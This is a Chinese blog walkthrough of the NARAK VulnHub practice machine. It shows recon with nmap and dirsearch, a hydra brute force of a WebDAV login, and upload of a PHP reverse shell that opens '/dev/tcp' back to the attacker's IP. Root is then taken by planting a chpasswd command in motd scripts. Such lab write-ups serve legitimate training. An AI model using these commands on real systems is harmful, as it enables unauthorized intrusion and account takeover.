靶机9:NARAK

已于 2023-11-10 15:38:39 修改
阅读量103 收藏 1
点赞数 1
分类专栏: 靶机 文章标签: 服务器 linux 网络
于 2023-10-31 17:16:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/133954532
版权

NARAK

注:改靶机是一个固定IP:需要配置网络

固定IP:192.168.26.0

1.信息收集

sudo arp-scan -l  扫描

sudo arp-scan -l

nmap扫描

sudo nmap 192.168.26.129 -T4

查看80端口

未发现可用内容

2.dirsearch扫描目录

dirsearch --url http://192.168.26.129

访问/webdav/

先爬取密码文件

cewl http://192.168.26.129  -w 192.168.26.129dict.txt

hydra爆破

hydra -L 192.168.26.129dict.txt -P 192.168.26.129dict.txt 192.168.26.129 http-get /webdav -v

登录后台

账号:yamdoot

密码:Swarg

3.进行上传文件

编写反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.26.128/1234 0>&1'"); ?>

进行上传

cadaver http://192.168.26.129/webdav/

返回查看

上传成功,kali开启nc

成功进入,查看cat /mnt/hell.sh

进行解密

BF加解密

chitragupt

查看有哪些用户

cat /etc/passwd

发现以下用户

inferno

进行远程登录

ssh inferno@192.168.26.129

登录成功后,查看user.txt,找到第一个flag

4.提权

查看sudo权限

发现没有

使用下面这个命令查找可以写入的root权限文件

find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "/var/*" 2>/dev/null

进入cd /etc/update-motd.d

修改内容

echo 'root:inferno'|sudo chpasswd
echo 'root:123456'| chpasswd

切换用户

su root

wj33333
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透测试:narak
x_13579的博客
07-03 438
hydra爆破,cewl爬取
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
VulnHub渗透测试实战靶场-HA:NARAK
LYJ20010728的博客
08-20 824
VulnHub渗透测试实战靶场-HA:NARAK环境下载HA:NARAK靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 HA:NARAK靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.140 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.
Narak靶机渗透
weixin_56306210的博客
01-31 452
Narak靶机渗透
Vulnhub-HA-NARAK靶机测试
qq_46015509的博客
04-24 2535
Vulnhub-HA-NARAK 靶机渗透
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
靶机练习 narak ,个人学习心得
09-08
靶机练习 NARAK,个人学习心得 靶机练习 靶机练习是渗透测试的重要组成部分,它可以帮助我们检测系统中的安全漏洞和脆弱性。在这个练习中,我们使用的靶机NARAK,并且通过渗透测试来获取 Flag。 探测靶机 IP ...
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu)
02-18
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu),真实有效,如有侵权,请联系csdn删除即可
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
[VulnHub靶机渗透] HA: Narak
最新发布
人若无名,便可专心练剑
02-22 1492
学渗透必打百台靶机实操精讲-Narak。涉及UDP突破,TFTP信息泄漏,webdav反弹shell上传。二级提权,第一级通过找到可写bash脚本文件中的brainfuck语句,获得凭据,二级通过motd脚本获得root权限。相比之前的视频,增加了些新知识,值得玩味的攻击链。可以结合靶机实操。
narak靶机总结
weixin_51692662的博客
11-06 644
webdav、narak靶机、motd提权
VulnHub靶机 narak
weixin_45208900的博客
08-28 277
链接:https://pan.baidu.com/s/1eWeX7HQ8bpNRXii5v_-39g 提取码:u1al –来自百度网盘超级会员V4的分享 arp-scan -l 探测存活主机 多出来的是192.168.37.164 就是我们的目标靶机 nmap探测一下 nmap -Pn -sV -n -A 192.168.37.164 -sV (版本探测) 打开版本探测。 -Pn和-P0都是跳过ping的步骤 -n (不用域名解析) 告诉Nmap 永不对它发现的活动IP地址进行反向域名解析 既然D
narak 靶机实验实战演练
lianliandad的博客
08-02 1129
仅供学习借鉴
narak靶场实战详解
Askshhbs的博客
04-22 1954
网络安全,web,Kali,渗透测试相关课件,工具,资料 可以关注公众号:“掌控安全课堂” 回复:“我想学黑客”即可免费获得 靶机:https://download.vulnhub.com/ha/narak.ova 注释:使用vmwarworkstation运行虚拟机 难度:中+ 目标:取得root权限+2Flag 网络配置:这里简单介绍下我的网络配置,靶机和Kali都用的VMware,然后使用nat连接,开启了dhcp。 0x00 环境配置 虚拟网络编辑器: Kali: 靶机
narak靶机打靶过程及思路
qq_52610024的博客
05-19 271
使用hydra进行爆破hydra-Ldict.txt-Pdict.txt10.1.8.133http-get/webdav-v后面的意思是使用http。继续查找文件find/-typef-userroot-perm-ug=x,o=w-execls-l‘{}’;上传反弹shell的php文件/usr/share/webshells/php/php-reverse-shell.php。使用CVE-2021-3493漏洞进行提权,提权成功拿下root账号。...
Vulnhub:narak靶机练习教程
m0_74887243的博客
05-13 164
使用dirb扫描网页目录,发现了webdav的路径,访问需要用户名和密码。目标:找到两个flag:user.txt root.txt。靶机22端口开启ssh服务;80端口开启http服务。使用kali自带的字典生成工具,从网页上爬取信息。访问靶机ip查看网页源代码,没有太大帮助。将webshell上传到webdav。使用ssh的登陆inferno。攻击机和靶机都使用net模式。使用nmap扫描到靶机ip。找到上传路径,上传成功。
靶场练习第三天~vulnhub靶场之narak
qq_57976347的博客
01-28 947
靶机下载链接: https://pan.baidu.com/s/1GxcSL6efwd0GcbY45WsD0A 提取码: dhr5 一、信息收集 1.使用namp 192.168.101.0/24扫描该网段的地址,寻找靶机IP 2.直接访问192.168.101.102 3.进行目录扫描,dirb目录扫描工具(kali自带的),使用命令dirb http://192.168.101.102,扫描后发现有3个网址,发现有webdav网址 二、利用webdav客户端,思路:cadav..
靶机渗透之narak
weixin_64267091的博客
02-04 1084
在这次靶机渗透过程中,走到漏洞分析阶段路就断了,发现在信息收集部分可能遗漏掉一些重要信息,最后又重点扫描了一些常见的UDP端口,最后扫出来了一个69端口。然后就利用这个服务找到了一个用户名及其密码,成功访问webdav。然后使用davtest测试webdav可以上传和执行哪些文件,发现可以上传并执行php,利用cadaver客户端上传反弹shell的php文件并访问shell.php,然后通过寻找敏感文件初步提权,找到brainfuck代码,用beef工具解码,发现了用户名inferno的ssh密码。
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值